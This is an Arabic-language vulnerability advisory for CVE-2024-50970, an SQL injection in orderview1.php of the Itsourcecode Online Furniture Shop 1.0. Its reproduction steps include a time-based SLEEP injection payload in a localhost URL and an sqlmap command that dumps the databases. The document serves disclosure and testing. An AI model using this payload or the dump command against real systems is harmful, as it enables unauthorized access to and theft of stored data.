CVE-2024-50970
الوصف
ثغرة حقن SQL في ملف orderview1.php من مشروع متجر الأثاث عبر الإنترنت Itsourcecode الإصدار 1.0 تسمح للمهاجمين عن بعد بتنفيذ أوامر SQL عشوائية عبر المتغير id.
نوع الثغرة
حقن SQL
بائع المنتج
Itsourcecode
قاعدة كود المنتج المتأثر:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
المكون المتأثر:
مشروع متجر الأثاث عبر الإنترنت Itsourcecode الإصدار 1.0 معرض لحقن SQL من خلال المتغير id في صفحة orderview1.php
متجهات الهجوم:
- قم بإعداد التطبيق محلياً، وسجل حساباً جديداً، ثم سجل الدخول به.
- انتقل إلى الرابط التالي في المتصفح:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- حقن حمولة SQL:
قم بتعديل المتغير id في الرابط ليتضمن حمولة حقن SQL تعتمد على الوقت.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- راقب استجابة التطبيق:
يجب أن تستغرق الصفحة وقتاً أطول (10 ثوانٍ) للتحميل إذا نجح الحقن، مما يؤكد أن المتغير id معرض لحقن SQL.
- استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
المراجع:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection